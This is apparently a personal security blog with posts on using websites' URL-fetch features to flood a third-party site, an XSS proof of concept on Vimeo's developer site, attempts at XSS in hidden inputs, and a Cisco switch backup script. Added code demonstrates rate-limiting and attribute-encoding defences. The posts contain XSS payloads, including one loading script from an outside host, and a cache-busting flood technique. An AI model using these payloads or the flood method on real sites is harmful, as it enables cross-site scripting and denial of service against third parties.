Tuesday, 27 January 2015

GET request Flooding, Websites as a proxy

This is a controversial vulnerability: some websites consider it a valid one, while others don't bother much about it.

Many websites have an option to fetch an image from an external URL, or to post a comment containing a link that triggers a real-time fetch of the linked page's title and description; these are the most common examples. In both cases a GET request is made to the third-party website, not from your PC but from the originating website's servers.

What if we customise that GET request and repeat it a couple of hundred times?
Let's take the example below to demonstrate this scenario:

We first find an input that makes the site request a URL from a third-party website, and we change that URL to any GET request we like.


When you press the import button the GET request is sent. We then capture the data being transmitted (for example in an intercepting proxy) so we can repeat the process.


Most websites don't allow the same request to be sent more than once, which is why we have to change a value (for example a throwaway query parameter) on every request. This can be done in many ways; in my case I wrote a small PHP cURL script that does it.
We copy all the previously captured data and paste it into the script for the flooding process.

If the attacker has a botnet, he can generate this request many times from different locations, all targeting a single website. The victim's website will log the IP addresses of the originating website rather than the attacker's, which lets the attacker obfuscate the attack one step further by using the website as a proxy.
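The scenario above, as an added example that is not the post's PHP cURL script: an in-process model of a "fetch this URL for me" feature. It shows why rejecting an exact duplicate URL does nothing against a replay with a changing cache-buster, and what a per-user and per-target budget does instead. No request leaves the process; the class and function names, the victim.example host and the numbers are all assumptions.

```python
"""Added example (not the post's PHP cURL script): an in-process model of a
"fetch this URL for me" feature. It shows why rejecting an exact duplicate URL
does nothing against flooding, and what a per-user and per-target budget does.
No request leaves this process; class, function and host names are assumptions."""
from collections import defaultdict, deque
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit


class NaiveFetcher:
    """The behaviour the post describes: the same URL string is fetched only once."""

    def __init__(self):
        self.seen = set()
        self.outbound = []  # URLs the server would request on the user's behalf

    def fetch(self, user, url):
        if url in self.seen:
            return "duplicate"
        self.seen.add(url)
        self.outbound.append(url)
        return "fetched"


def cache_bust(url, i):
    """Attacker side: append a throwaway query parameter so every replay differs."""
    parts = urlsplit(url)
    query = parse_qsl(parts.query, keep_blank_values=True) + [("cb", str(i))]
    return urlunsplit(parts._replace(query=urlencode(query)))


def step_clock(step=0.01):
    """Deterministic clock for the demo: each call is `step` seconds later."""
    now = [0.0]

    def clock():
        now[0] += step
        return now[0]
    return clock


class HardenedFetcher:
    """Sliding-window budgets per requesting user and per target host. Keying on
    the host, not the full URL, makes the cache-busting parameter irrelevant."""

    def __init__(self, per_user, per_host, window, clock):
        self.per_user, self.per_host, self.window, self.clock = per_user, per_host, window, clock
        self.by_user, self.by_host = defaultdict(deque), defaultdict(deque)
        self.outbound = []

    def _recent(self, log, key, now):
        q = log[key]
        while q and now - q[0] >= self.window:
            q.popleft()
        return len(q)

    def fetch(self, user, url):
        parts = urlsplit(url)
        if parts.scheme not in ("http", "https") or not parts.hostname:
            return "rejected-url"  # no file://, gopher:// etc. through the fetcher
        now = self.clock()
        host = parts.hostname.lower()
        if self._recent(self.by_user, user, now) >= self.per_user:
            return "user-rate-limited"
        if self._recent(self.by_host, host, now) >= self.per_host:
            return "target-rate-limited"
        self.by_user[user].append(now)
        self.by_host[host].append(now)
        self.outbound.append(url)
        return "fetched"


def flood(fetcher, base_url, attempts, users=("attacker",)):
    """Replay the captured request `attempts` times with a changing cache-buster,
    cycling through `users` (one account, or one per bot). Returns how many
    outbound requests the target would actually receive."""
    for i in range(attempts):
        fetcher.fetch(users[i % len(users)], cache_bust(base_url, i))
    return len(fetcher.outbound)


if __name__ == "__main__":
    target = "http://victim.example/big-image.png"  # constructed target
    bots = tuple(f"bot{i}" for i in range(100))
    print("naive, one account:   ", flood(NaiveFetcher(), target, 300))
    print("hardened, one account:", flood(HardenedFetcher(10, 20, 60.0, step_clock()), target, 300))
    print("hardened, 100 bots:   ", flood(HardenedFetcher(10, 20, 60.0, step_clock()), target, 300, bots))
```

With 300 replays the naive fetcher forwards all 300, because every cache-busted URL is a new string. The hardened one forwards 10 from a single account and 20 from a hundred "bot" accounts: the per-user budget covers the single-account case from the post, and the per-target budget covers the botnet case, since it is keyed on the host the users asked for rather than on who asked.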


Tuesday, 13 January 2015

XSS on Vimeo

http://developer.vimeo.com had a flaw in one of its inputs.

Here is how it works:

They have an input where you can add a URL; the site fetches an image from wherever the URL points and displays it as the logo for your app:


Apart from the XSS, they weren't filtering the URL to accept only image links.

The PoC XSS:

http://alex.avlonitis.me/images/face.png' onmouseover="onmouseover="alert(document.domain)"

How the input breaks:



Saturday, 10 January 2015

Xss in hidden input. Possible?

While I was trying to find a way to exploit a vulnerable HTML hidden input on a well-known website (the < and > characters were sanitised), I gathered some notes from trying many different techniques that might help on another website.
The vulnerable input looks something like this:

<input id='myInput' type='hidden' value='dynamic'/> 

It could be broken with a single quote followed by an event handler: ' onmouseover="alert(1)" . The tag would then become:

<input id='myInput' type='hidden' value='dynamic' onmouseover="alert(1)" />

Unfortunately, even though we have broken into the tag with onmouseover, nothing happens: a hidden input renders nothing on the page to hover over. None of the other event attributes worked either, including onchange.

Can we override the type attribute by adding type="text"?
No, that's not possible any more: when a tag carries the same attribute twice, browsers keep the first occurrence and drop the later ones, and type='hidden' comes before our injection.

What if we style it inline with CSS and make it visible, with the examples below:
style="display: block;width: 999px;height: 999px;"
style="display: inline;width: 999px;height: 999px;"
style="visibility: visible;"
None of that worked in this case: the browser's built-in stylesheet hides type='hidden' inputs with display: none !important, which an inline style cannot override.

Maybe try to fire JavaScript from within CSS:
style="width: expression(alert('xss'));"
style="-moz-binding:url('http://ha.ckers/xss.js');"
No luck: expression() only ever worked in old Internet Explorer and -moz-binding only in old Firefox, so neither helps in a current browser.

Haven't found a way to bypass this yet.

sources:
owasp.org
sla.ckers.org
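As an added example (not Vimeo's code and not from either post above), here is the attribute-context breakout that both the Vimeo PoC and the hidden-input experiment rely on, next to the two checks that close it: attribute encoding of the value, and, for the image URL, validation of the scheme before the value is used at all. It also reproduces the hidden-input post's filter (only < and > removed) to show why that alone does not help. The payloads, the function names and the example.test host are constructed for the example.

```python
"""Added example (not Vimeo's code or the posts' own): the attribute-context
breakout behind the Vimeo PoC and the hidden-input experiment, next to the
two checks that close it. Host names and payloads are constructed."""
import html
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Payloads in the shape of the posts' PoCs (example.test is an illustrative host).
IMG_PAYLOAD = "http://example.test/face.png' onmouseover=\"alert(document.domain)\""
HIDDEN_PAYLOAD = "dynamic' onmouseover=\"alert(1)\""


def render_logo_unsafe(url):
    """Straight interpolation: the ' in the payload ends src= early."""
    return f"<img src='{url}'>"


def strip_angle_brackets(value):
    """The hidden-input post's filter: only < and > are removed, quotes survive."""
    return value.replace("<", "").replace(">", "")


def render_hidden_angle_only(value):
    return f"<input id='myInput' type='hidden' value='{strip_angle_brackets(value)}'/>"


def attr(value):
    """Attribute encoding: &, <, >, \" and ' become entities, so no value can
    terminate the attribute it sits in, whichever quote style the template uses."""
    return html.escape(value, quote=True)


def validate_image_url(url):
    """Allow only absolute http(s) URLs with an image-looking path. The extension
    is a cheap sanity filter, not proof of content: the real type is only known
    once the server fetches the bytes, and that fetch needs size and time limits."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        raise ValueError("only absolute http(s) URLs are accepted")
    if not parts.path.lower().endswith((".png", ".jpg", ".jpeg", ".gif")):
        raise ValueError("URL does not look like an image")
    return url


def render_logo_safe(url):
    return f"<img src='{attr(validate_image_url(url))}'>"


def render_hidden_safe(value):
    return f"<input id='myInput' type='hidden' value='{attr(value)}'/>"


class _FirstTag(HTMLParser):
    def __init__(self):
        super().__init__()
        self.attrs = None

    def handle_starttag(self, tag, attrs):
        if self.attrs is None:
            self.attrs = dict(attrs)

    handle_startendtag = handle_starttag


def parsed_attrs(markup):
    """Parse the markup roughly the way a browser would and return the first
    tag's attributes; an injected handler shows up here as its own key."""
    p = _FirstTag()
    p.feed(markup)
    return p.attrs or {}


if __name__ == "__main__":
    for markup in (render_logo_unsafe(IMG_PAYLOAD), render_hidden_angle_only(HIDDEN_PAYLOAD),
                   render_hidden_safe(HIDDEN_PAYLOAD)):
        print(markup, "->", sorted(parsed_attrs(markup)))
    try:
        render_logo_safe(IMG_PAYLOAD)
    except ValueError as e:
        print("rejected:", e)
```

The two defences are layered on purpose: a URL such as http://example.test/face.png' onmouseover="alert(1)"/x.png passes the extension check, and it is the attribute encoding that keeps it inside src=. Conversely, encoding alone would still let a javascript: URL through as a perfectly well-formed src value, which is what the scheme check is for.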



Sunday, 4 January 2015

Automated Backup of Cisco switches

I created a small Perl script to auto-backup the Cisco switches on the network; it connects to both SSH- and telnet-configured switches.

Libraries you will need: Net::SSH2, Net::Telnet::Cisco
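The same backup flow, as an added example in Python rather than the Perl the post describes (this is not the post's script): the SSH transport uses paramiko (assumed installed; unknown host keys are rejected rather than auto-added), while config extraction and file writing are plain standard library and are exercised here against a constructed fake switch so the whole thing runs offline. The telnet side is deliberately left out: telnetlib was removed from the standard library in Python 3.13, and telnet sends the login and the entire configuration in clear text, so a telnet-only switch is something to fix rather than to keep scripting around; a telnet transport would only need to provide the same run() and close() pair. Host names, credentials, file locations and the sample output are assumptions.

```python
"""Added example, not the post's Perl script: the same backup flow in Python, with
the transport (SSH via paramiko) kept apart from the config extraction and file
writing so those run offline against a fake switch. Host names, credentials and
the sample switch output below are constructed."""
import os
import re
import stat
import tempfile
from datetime import datetime

PROMPT = re.compile(r"^[\w.\-]+[#>]\s*$")  # IOS exec prompt alone on a line, e.g. "SW1#"


def ends_with_prompt(text):
    lines = text.rstrip().splitlines()
    return bool(lines) and PROMPT.match(lines[-1]) is not None


def read_until_prompt(read_chunk):
    """Drain a transport until a prompt shows up; read_chunk() returns b"" on EOF."""
    text = ""
    while not ends_with_prompt(text):
        chunk = read_chunk()
        if not chunk:
            raise EOFError("connection closed before a prompt was seen")
        text += chunk.decode(errors="replace")
    return text


class SshSession:
    """SSH transport; a telnet transport would expose the same run()/close() pair."""

    def __init__(self, host, user, password, timeout=10):
        import paramiko  # third-party, so imported only where it is needed
        self.client = paramiko.SSHClient()
        self.client.load_system_host_keys()  # trust known_hosts entries only,
        self.client.set_missing_host_key_policy(paramiko.RejectPolicy())  # never auto-add keys
        self.client.connect(host, username=user, password=password, timeout=timeout,
                            look_for_keys=False, allow_agent=False)
        self.chan = self.client.invoke_shell()
        self.chan.settimeout(timeout)  # recv() raises socket.timeout if the switch goes quiet
        self.run("")  # swallow the banner up to the first prompt

    def run(self, command):
        self.chan.send(command + "\n")
        return read_until_prompt(lambda: self.chan.recv(65535))

    def close(self):
        self.client.close()


def extract_config(raw):
    """Keep the body from the first '!'/'version' line to 'end'; drop the echoed
    command, the 'Building configuration...' chatter and the trailing prompt."""
    lines = [line.rstrip("\r") for line in raw.splitlines()]
    start = next((i for i, l in enumerate(lines) if l == "!" or l.startswith("version ")), None)
    if start is None:
        raise ValueError("no configuration in output")
    if "end" not in lines[start:]:
        raise ValueError("configuration is truncated (no 'end' line)")
    end = len(lines) - 1 - lines[::-1].index("end")
    return "\n".join(lines[start:end + 1]) + "\n"


def save_config(dest_dir, name, config, when=None):
    """Configs hold enable secrets, SNMP communities and user hashes: treat the
    backup directory like a credential store (0700 dir, 0600 files)."""
    os.makedirs(dest_dir, mode=0o700, exist_ok=True)
    stamp = (when or datetime.now()).strftime("%Y%m%d-%H%M%S")
    path = os.path.join(dest_dir, f"{name}-{stamp}.cfg")
    with os.fdopen(os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600), "w") as f:
        f.write(config)
    return path


def backup_device(name, session, dest_dir, when=None):
    try:
        session.run("terminal length 0")  # no --More-- pagination in the output
        config = extract_config(session.run("show running-config"))
    finally:
        session.close()
    return save_config(dest_dir, name, config, when)


class FakeSession:  # constructed stand-in for a switch, so the flow runs offline
    OUTPUT = ("show running-config\r\nBuilding configuration...\r\n\r\nCurrent configuration : 321 bytes"
              "\r\n!\r\nversion 15.0\r\nhostname SW1\r\n!\r\nenable secret 5 $1$abcd$xxxxxxxxxxxxxxxxxxxxxx"
              "\r\n!\r\ninterface GigabitEthernet0/1\r\n switchport mode access\r\n!\r\nend\r\n\r\nSW1#")

    def run(self, command):
        return self.OUTPUT if command == "show running-config" else "SW1#"

    def close(self):
        pass


def demo(dest_dir=None):
    """Back up the fake switch; returns (path, file text, permission bits)."""
    path = backup_device("SW1", FakeSession(), dest_dir or tempfile.mkdtemp(prefix="cfgbak-"))
    with open(path) as f:
        text = f.read()
    return path, text, stat.S_IMODE(os.stat(path).st_mode)
```

demo() writes the fake switch's configuration under a temporary directory as a 0600 file; for a real switch, replace FakeSession() with SshSession(host, user, password), taking the credentials from the environment or a secret store rather than from the script, and point dest_dir at a directory that is itself only readable by the backup account. The O_EXCL open also means a second run in the same second fails loudly rather than silently overwriting a backup.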